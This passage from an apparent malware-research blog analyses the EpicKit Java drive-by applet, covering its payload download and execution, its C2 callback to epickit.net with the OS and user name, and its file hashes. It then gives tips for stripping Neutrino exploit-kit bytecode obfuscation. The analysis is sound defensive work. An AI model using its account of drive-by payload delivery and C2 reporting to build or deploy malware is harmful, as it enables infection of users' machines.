<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtBpncVwsIbVNtMif8Ha_5oqUIrjWwc0Tq0h13NwHh-2sT41BD8xuElgY9bLleQdrGhosDqSzwN_OQtyyE_WGc0P7PuBoOyQrFanlWQnVzh1Sv6PN_vg7XINEtwsG8ikbFLac9VgrL3J-/s1600/2014-01-14-EpicJDB-URL-pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtBpncVwsIbVNtMif8Ha_5oqUIrjWwc0Tq0h13NwHh-2sT41BD8xuElgY9bLleQdrGhosDqSzwN_OQtyyE_WGc0P7PuBoOyQrFanlWQnVzh1Sv6PN_vg7XINEtwsG8ikbFLac9VgrL3J-/s1600/2014-01-14-EpicJDB-URL-pattern.png" height="51" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">sample of Epic JDB URL pattern</span></i></div>
<br />
The JAR file is signed with the following certificate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzHdaRVnuZyH6ROrhw-GGavx54noKQG3VEfXdSLgBv-kqpjLtkO3K2CW9MYV1bfwdeYyEPA3RgmMuVGrdCUrwqJ1P_MpJiZ97tQvjMDx8NxmC-06obhktZwHU4c22QsyiIBwZebTngDYD/s1600/2014-01-14-EpicJDB-URL-certificate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzHdaRVnuZyH6ROrhw-GGavx54noKQG3VEfXdSLgBv-kqpjLtkO3K2CW9MYV1bfwdeYyEPA3RgmMuVGrdCUrwqJ1P_MpJiZ97tQvjMDx8NxmC-06obhktZwHU4c22QsyiIBwZebTngDYD/s1600/2014-01-14-EpicJDB-URL-certificate.png" height="155" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">certificate the JAR file is signed with</span></i></div>
<br />
JAR file structure is quite simple - only 1 class file inside.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUr-JNsbWRcvFji2PfGIz43JyhIPKvICytvwIQ5y0VgVOSblElNRmtuT3TInzUksbHtJOJHqCeLvE97ttln8F_q8hwDZQWXNMRktOpQA3vhPgTV_BEGNFp9-jODUb56khrsWYNM8hiBK2/s1600/2014-01-14-EpicJDB-JAR-structure.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUr-JNsbWRcvFji2PfGIz43JyhIPKvICytvwIQ5y0VgVOSblElNRmtuT3TInzUksbHtJOJHqCeLvE97ttln8F_q8hwDZQWXNMRktOpQA3vhPgTV_BEGNFp9-jODUb56khrsWYNM8hiBK2/s1600/2014-01-14-EpicJDB-JAR-structure.png" height="134" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JD-GUI - Epic JDB JAR file structure</span></i></div>
<br />
As can be seen in the screenshot above, ZKM is doing a good job at obfuscating the code. JD-GUI couldn't handle it. After some Voodoo magic with <a href="https://github.com/Contra/JMD" rel="nofollow" target="_blank">JMD</a> reversing some of ZKM changes and Procyon Java <a href="https://bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler" rel="nofollow" target="_blank">Decompiler</a> restoring Java code and getting Bytecode AST, I got some readable code. The applet execution starts with gathering some system data and pulling values of some parameters from the landing page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDf9K1TEH_4P3LxdlA3gKkcFWwUpKX_R9QtMqGqT2m-rwAd7KgdMrBWPxTn1FXSi5IcsZHJ1YJuuXJryvJ8WNBMNmM0TyqCCWniMU96Em4DvSKoFJsWtL1GC1Py8K-To2Og2GLGxzsaMq1/s1600/2014-01-14-EpicJDB-applet-code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDf9K1TEH_4P3LxdlA3gKkcFWwUpKX_R9QtMqGqT2m-rwAd7KgdMrBWPxTn1FXSi5IcsZHJ1YJuuXJryvJ8WNBMNmM0TyqCCWniMU96Em4DvSKoFJsWtL1GC1Py8K-To2Og2GLGxzsaMq1/s1600/2014-01-14-EpicJDB-applet-code1.png" height="66" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - information gathering and retrieval</span></i></div>
<br />
After '<span style="color: #3d85c6;">massaging</span>' the gathered data a little bit, a GET request is made to pull down the Initial Payload from a predefined location stored in applet's '<span style="color: #3d85c6;">ca</span>' parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MUxuwsBx4fpPJjtEynF4Kwy_B7I2ZKj_2j4w2fbvzJxycZDS3BC07rHG-XqwLjKT1mhPX6J6B-tXVqkZ832Gn6Fw3UaOi12luJYLdLEu2JF5pYZkiLdzvg9BZbKLtQidDMnrvuydepJv/s1600/2014-01-14-EpicJDB-applet-code2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MUxuwsBx4fpPJjtEynF4Kwy_B7I2ZKj_2j4w2fbvzJxycZDS3BC07rHG-XqwLjKT1mhPX6J6B-tXVqkZ832Gn6Fw3UaOi12luJYLdLEu2JF5pYZkiLdzvg9BZbKLtQidDMnrvuydepJv/s1600/2014-01-14-EpicJDB-applet-code2.png" height="40" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - data manipulations and Initial Payload request</span></i></div>
<br />
After the Initial payload is downloaded, the code checks the type of the file downloaded by looking for '<span style="color: #3d85c6;">.ex</span>' expression in applet's '<span style="color: #3d85c6;">us</span>' parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaJNSmIcExoO245GzVeiMvT1s2_LyZLoY5BxMIh_AAlmk4mRDjJWdHvtaD3WbOoecVznk4KcYdUtadbz4PQsNC57eyWSewS41745Pt5p4tVWk6KublUXcA83I7KD50stgrZV5mkQAcH3as/s1600/2014-01-14-EpicJDB-applet-AST1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaJNSmIcExoO245GzVeiMvT1s2_LyZLoY5BxMIh_AAlmk4mRDjJWdHvtaD3WbOoecVznk4KcYdUtadbz4PQsNC57eyWSewS41745Pt5p4tVWk6KublUXcA83I7KD50stgrZV5mkQAcH3as/s1600/2014-01-14-EpicJDB-applet-AST1.png" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Initial Payload type check (bytecode AST view)</span></i></div>
<br />
If an '<span style="color: #3d85c6;">exe</span>' filename is detected the code goes straight to executing it, redirecting the browser to the initial compromised website which address is stored in applet's '<span style="color: #3d85c6;">uk</span>' parameter and reporting to C2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFBsb8WJl05Bh2sLoZvPSRKWqt8nXL0vJwxxCBs282EnHYoojBO3rGhvl-YMS-QlNlHje6we3EFKwzNyHUTIw7JRzu5jjlRTOG5KLx0fQt0sbjHLkQSqoE51GBc3wQeFx1Kk7gQhRpa0e/s1600/2014-01-14-EpicJDB-applet-code3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFBsb8WJl05Bh2sLoZvPSRKWqt8nXL0vJwxxCBs282EnHYoojBO3rGhvl-YMS-QlNlHje6we3EFKwzNyHUTIw7JRzu5jjlRTOG5KLx0fQt0sbjHLkQSqoE51GBc3wQeFx1Kk7gQhRpa0e/s1600/2014-01-14-EpicJDB-applet-code3.png" height="39" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Initial Payload execution, browser redirect and callback request</span></i></div>
<br />
C2 URL is hardcoded and pointing at '<span style="color: #3d85c6;">epickit.net</span>' website. The following parameters and data are being added to the URL before being sent:<br />
<ul>
<li>'<span style="color: #3d85c6;">username=</span>' holds predefined value that is stored in applet's '<span style="color: #3d85c6;">nl</span>' parameter and in this sample is '<span style="color: #3d85c6;">fox33</span>'. Possibly, it defines the campaign owner.</li>
<li>'<span style="color: #3d85c6;">os=</span>' holds the type of the OS the applet is running on. It's gathered through '<span style="color: #3d85c6;">System.getProperty("os.name");</span>'</li>
<li>'<span style="color: #3d85c6;">pc=</span>' holds the username of the currently logged in user. It's gathered through '<span style="color: #3d85c6;">System.getProperty("user.name");</span>'</li>
</ul>
<div>
In addition, the word '<span style="color: #3d85c6;">Traditional</span>' is added to the request. I'm not quite sure about the purpose of it, but my best guess is it's work in progress artefact. Purposely or not, I was greeted with the following response after C2 GET request:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyCcCEkIBm9NcTIhnfS91Irs1VKNhlbwR2cEOlI0NTIWr4AKywEdP2wx9cgihsaozaJ9MBSM9-e66mhyApCDjCyTsa4JHFkUmnCzHF_V_y3B7oXhJeU4ULc_x17q8D-thqkIzS1prPb0g-/s1600/2014-01-14-EpicJDB-callback-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyCcCEkIBm9NcTIhnfS91Irs1VKNhlbwR2cEOlI0NTIWr4AKywEdP2wx9cgihsaozaJ9MBSM9-e66mhyApCDjCyTsa4JHFkUmnCzHF_V_y3B7oXhJeU4ULc_x17q8D-thqkIzS1prPb0g-/s1600/2014-01-14-EpicJDB-callback-response.png" height="88" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Callback response</span></i></div>
</div>
<div>
<br /></div>
<div>
The file execution part is slightly different if the Initial Payload is a '<span style="color: #3d85c6;">jar</span>' file. After confirming that underlying platform is '<span style="color: #3d85c6;">windows</span>', the following code is executed:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4-ncDG_jOE3hh3oFske67pnBoobnf6SeqCxHkKl6elp5NBc-9tXpqfqtyW54P7NeJnfvB5f-1s75zRkp5N1f_51dX6oyH-hOcoOsZqYSFwmDfOb9BecxYy5J04cHcfpDiYa0JUTg1ypHd/s1600/2014-01-14-EpicJDB-applet-code4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4-ncDG_jOE3hh3oFske67pnBoobnf6SeqCxHkKl6elp5NBc-9tXpqfqtyW54P7NeJnfvB5f-1s75zRkp5N1f_51dX6oyH-hOcoOsZqYSFwmDfOb9BecxYy5J04cHcfpDiYa0JUTg1ypHd/s1600/2014-01-14-EpicJDB-applet-code4.png" height="29" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - JAR file execution routine</span></i></div>
<br />
There are some code artefacts that might be an indication of ongoing code development or could be simply the results of ZKM messing with the code.<br />
<br />
<b><span style="color: #3d85c6;">Summary</span></b><br />
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Epic Java Drive-By a.k.a EpicKit</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2014-01-14</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2014-01-14</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Intel source - <a href="https://twitter.com/MaartenVDantzig" rel="nofollow" target="_blank">@MaartenVDantzig</a> <a href="https://twitter.com/cryptoron" rel="nofollow" target="_blank">@cryptoron</a>.<br />
Data source - live traffic capture with Fiddler.</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">Yes - 4</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Zelix KlassMaster - String encryption, Variable Names & Control Flow obfuscation</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">System's Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">javasan.exe</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;">JAR - <a href="https://www.virustotal.com/en/file/d3b1607ea770459707c89928707e7768d449bc856bf91c684849e97f4c3f55e2/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;">EXE(MD5 f79eb2c78a11194cde18cc7190304ec5)<br />
<a href="https://malwr.com/analysis/YjE5MTMyMzQ3YTkyNDk3MGE3NjkxZWE0NTBlNjEyNzI/" rel="nofollow" target="_blank">https://malwr.com/</a> <br />
<a href="https://www.virustotal.com/en/file/3124fc4b6acf28cbebd8463cbf3e7279a73135e0c64b0133adc4c18188761f6e/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">Uses certificate signed JAR to bypass Java security measures.<br />
Supports 2 Initial Payload file formats - EXE and JAR<br />
Shares some similarity with Zuponcic Kit</td>
</tr>
</tbody></table>
</div>
<br />
<br />
External References:<br />
<a href="http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/" rel="nofollow" target="_blank">http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/</a><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-25616767179966002192014-01-12T16:09:00.002+00:002014-01-19T10:58:52.953+00:00Deobfuscation tips: Reversing Java bytecode 'poisoning'<u>DISCLAIMER:</u> I'm pretty sure there are better and more efficient(automated) methods exist to achieve the same results as the below exercise. My intention was to do it manually using freely available tools. Time was not a concern. I'm not aware of a proper name for this obfuscation technique - so I called it '<span style="color: #3d85c6;">Java bytecode poisoning</span>'. This is not a step-by-step guide - these are just some tips.<br />
<br />
If you're to try this method following the steps described below you'll need to have the following skills and tools:<br />
<br />
<b>Skills</b><br />
<ul>
<li>Good understanding of Java class file structure</li>
<li>Good understanding of Java bytecode instructions</li>
<li>Basic understanding of How LIFO stack works</li>
</ul>
<b>Tools</b><br />
<ul>
<li><a href="http://dirty-joe.com/" rel="nofollow" target="_blank">dirtyJOE</a> - Java Overall Editor</li>
<li><a href="http://set.ee/jbe/" rel="nofollow" target="_blank">JBE</a> - Java Bytecode Editor</li>
<li><a href="http://jd.benow.ca/" rel="nofollow" target="_blank">JD-GUI</a> - Java Decompiler</li>
</ul>
<div>
<u style="font-style: italic;">Update 2014-01-19:</u> Discovered a tool that simplifies the task dramatically. Apart from handy text-editor type interface for bytecode editing, it also adjusts exceptions and conditional jumps addressing automatically. reJ - <a href="http://rejava.sourceforge.net/index.html" rel="nofollow" target="_blank">http://rejava.sourceforge.net/index.html</a></div>
<div>
<br /></div>
<b><span style="color: #3d85c6;">When cosmic rays hit atoms...</span></b><br />
<br />
<u>NOTE:</u> Neutrino EK sample was obtained from <a href="http://www.malware-traffic-analysis.net/2014/01/02/index.html" rel="nofollow" target="_blank">www.malware-traffic-analysis.net</a><br />
<br />
Not that long ago Neutrino EK authors started using some bytecode obfuscation technique that rendered some of the Java Decompilers useless when restoring Neutrino's source code. Here is how decompiled Neutrino EK used to look before this '<span style="color: #3d85c6;">upgrade</span>'...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6SWLRvTnacAdy2_9HJbjB0GRmpZ0DsqjTVwkgQlFPbRoThRau6OqWcixPZn9u_W-qxl6hgZuBFBIc0xIYWBsB2DYVXHqa4I_ISrMfynmIoxw2g1-n6m3bVTXwt6ctLBk_Jm8TiN3taSc_/s1600/2013-09-Neutrino-code-sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6SWLRvTnacAdy2_9HJbjB0GRmpZ0DsqjTVwkgQlFPbRoThRau6OqWcixPZn9u_W-qxl6hgZuBFBIc0xIYWBsB2DYVXHqa4I_ISrMfynmIoxw2g1-n6m3bVTXwt6ctLBk_Jm8TiN3taSc_/s1600/2013-09-Neutrino-code-sample.png" height="161" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK 2013-09 sample decompiled using JD-GUI</i></span></div>
<br />
Apart from some string obfuscation, the code is pretty readable. And here is how one of the recent samples looks like when decompiled using the same JD-GUI tool...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB12r49reWWSd_7o86GQTtIiE1dCQcMYaZc300WoHoNbyo0v6YFv8VjbgkcJXFtJ2fJcFkuayANghl1Q-nBTKoDrlQYCvaThUyCS8OaJ3796_FvKgEYy73G4XW03q85Es5f9KFZ4qxRQ8B/s1600/2014-01-Neutrino-code-sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB12r49reWWSd_7o86GQTtIiE1dCQcMYaZc300WoHoNbyo0v6YFv8VjbgkcJXFtJ2fJcFkuayANghl1Q-nBTKoDrlQYCvaThUyCS8OaJ3796_FvKgEYy73G4XW03q85Es5f9KFZ4qxRQ8B/s1600/2014-01-Neutrino-code-sample.png" height="266" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK 2014-01 sample decompiled using JD-GUI</span></i></div>
<br />
Where some of the source code was successfully decompiled, the methods are padded with tons of meaningless entries. First thing that comes to mind is to simply remove all of this rubbish. Lets do just that and see what happens...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHU-d9d7uZA1vnq_BkTMyc9299QS518JGZz6Wo30E0U6RG727GACFeSS66jLVNLMVp-ZVQWX9Ymbrgvfpeya72Z6y8LSl-HRUO2PR0WeErIBdLqoSzeZ3OIv23GlayTyReI7jGiQvExHlf/s1600/2014-01-Neutrino-simple-deobfuscation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHU-d9d7uZA1vnq_BkTMyc9299QS518JGZz6Wo30E0U6RG727GACFeSS66jLVNLMVp-ZVQWX9Ymbrgvfpeya72Z6y8LSl-HRUO2PR0WeErIBdLqoSzeZ3OIv23GlayTyReI7jGiQvExHlf/s1600/2014-01-Neutrino-simple-deobfuscation.png" height="320" width="222" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled code after rubbish clean up</span></i></div>
<br />
Some parts of the output can help to understand what the code is doing, but it's not a valid Java code. The same approach definitely wouldn't work for methods similar to the one below...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALcqhS4zvItXe4F23A8gRWR4ruUKTOhEOtkP6rnyxpCpWC9Sz37p3wTnToEpdstd-UbnVKWnuIR-5ViEdf49EgxHudeVl43tPuxhIRPzysFHT8PCPgRNunb_Cjbjg_WIE6DHoTnDjsd5h/s1600/2014-01-Neutrino-obfuscated-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALcqhS4zvItXe4F23A8gRWR4ruUKTOhEOtkP6rnyxpCpWC9Sz37p3wTnToEpdstd-UbnVKWnuIR-5ViEdf49EgxHudeVl43tPuxhIRPzysFHT8PCPgRNunb_Cjbjg_WIE6DHoTnDjsd5h/s1600/2014-01-Neutrino-obfuscated-method.png" height="240" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled obfuscated Java method</span></i></div>
<br />
If we're to remove all the rubbish from this method we end up with no code left, but this method actually performs the following...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gJH7__0x0FtYEPIIFb1U9G_7sF4Kg293a8j4uwoSR8sPEkEnDz7TyVh5SmFhrxorLDcwDUaqu-4CHSnN9AZ5ELdckzMcaq06p93UDfN_MSpP9xcUoyh6jR_0cGvdR_O0RZ93dfgqyyRk/s1600/2014-01-Neutrino-deobfuscated-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gJH7__0x0FtYEPIIFb1U9G_7sF4Kg293a8j4uwoSR8sPEkEnDz7TyVh5SmFhrxorLDcwDUaqu-4CHSnN9AZ5ELdckzMcaq06p93UDfN_MSpP9xcUoyh6jR_0cGvdR_O0RZ93dfgqyyRk/s1600/2014-01-Neutrino-deobfuscated-method.png" height="65" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK decompiled deobfuscated Java method</span></i></div>
<br />
So, how do we jump from '<span style="color: #3d85c6;">no sense</span>' to '<span style="color: #3d85c6;">full picture</span>'? The answer is in the bytecode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOwhtGP2Io8aVh1eEblGTfZGj7FwIHor0Wmd5QyAIv97b1pp_ldmS_SN3rI8sKby3YmicS4BgRtDF0JneqQU5QVNf-xZrQ8OdnVbdHRBmj1fFOjOxDvVvGhWGiHex2jJ0CPDUOqGHz9jm/s1600/2014-01-Neutrino-bytecode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOwhtGP2Io8aVh1eEblGTfZGj7FwIHor0Wmd5QyAIv97b1pp_ldmS_SN3rI8sKby3YmicS4BgRtDF0JneqQU5QVNf-xZrQ8OdnVbdHRBmj1fFOjOxDvVvGhWGiHex2jJ0CPDUOqGHz9jm/s1600/2014-01-Neutrino-bytecode.png" height="320" width="223" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">txjLPjLxt</span>' method in bytecode view</span></i></div>
<br />
What we're looking for are '<span style="color: #3d85c6;">push</span>' and '<span style="color: #3d85c6;">pop</span>' instructions and more importantly what happens in between. As you read through the bytecode, you might notice patterns start to emerge involving these two operations. Patterns similar to these...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVTJR0hiQ7gtr8hbq3m0Eb0uAANOSXZm_erlvkIxibnXoAlrVhpTRSlogclqLaRWmFYyN4XAsgFiuaKy1SsDWdGY146CMCQHEaA5uPaZE3rvlYNLdBHk8-XY8ETvvwHr9tMo5WRirA1-W/s1600/2014-01-Neutrino-patterns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVTJR0hiQ7gtr8hbq3m0Eb0uAANOSXZm_erlvkIxibnXoAlrVhpTRSlogclqLaRWmFYyN4XAsgFiuaKy1SsDWdGY146CMCQHEaA5uPaZE3rvlYNLdBHk8-XY8ETvvwHr9tMo5WRirA1-W/s1600/2014-01-Neutrino-patterns.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">examples of '<span style="color: #3d85c6;">push</span>' & '<span style="color: #3d85c6;">pop</span>' bytecode patterns</span></i></div>
<br />
In terms of application execution, these instructions have no effect on any application parts, but doing great keeping CPU busy running them. For example, pattern 1 --> pushes 2 bytes on the stack --> swapping them --> popping them of the stack. So, what happens if we're to relief the CPU from the burden of running these instructions by removing them from the bytecode. The below is what's left of the '<span style="color: #3d85c6;">real</span>' instructions...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIddDzHYD36uvaZCZmNeTCKxAysQGEGM4yxM16DYNBFypx6PFSss95NbymWaxf40qP-zAzboam5XdmMebp6LPZ0apQm0tett00WgMJc8Qy6qQAYi3tjaS2oWchRzqEPEqu2CeRp-2KKfmW/s1600/2014-01-Neutrino-bytecode-cleaned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIddDzHYD36uvaZCZmNeTCKxAysQGEGM4yxM16DYNBFypx6PFSss95NbymWaxf40qP-zAzboam5XdmMebp6LPZ0apQm0tett00WgMJc8Qy6qQAYi3tjaS2oWchRzqEPEqu2CeRp-2KKfmW/s1600/2014-01-Neutrino-bytecode-cleaned.png" height="261" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">bytecode after '<span style="color: #3d85c6;">push</span>' and '<span style="color: #3d85c6;">pop</span>' patterns are removed</span></i></div>
<br />
Lets now come back to the '<span style="color: #3d85c6;">init</span>' method we started with and perform the same bytecode clean up and compare the result with the previous deobfuscation method where we simply removed the rubbish entries from the decompiled code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
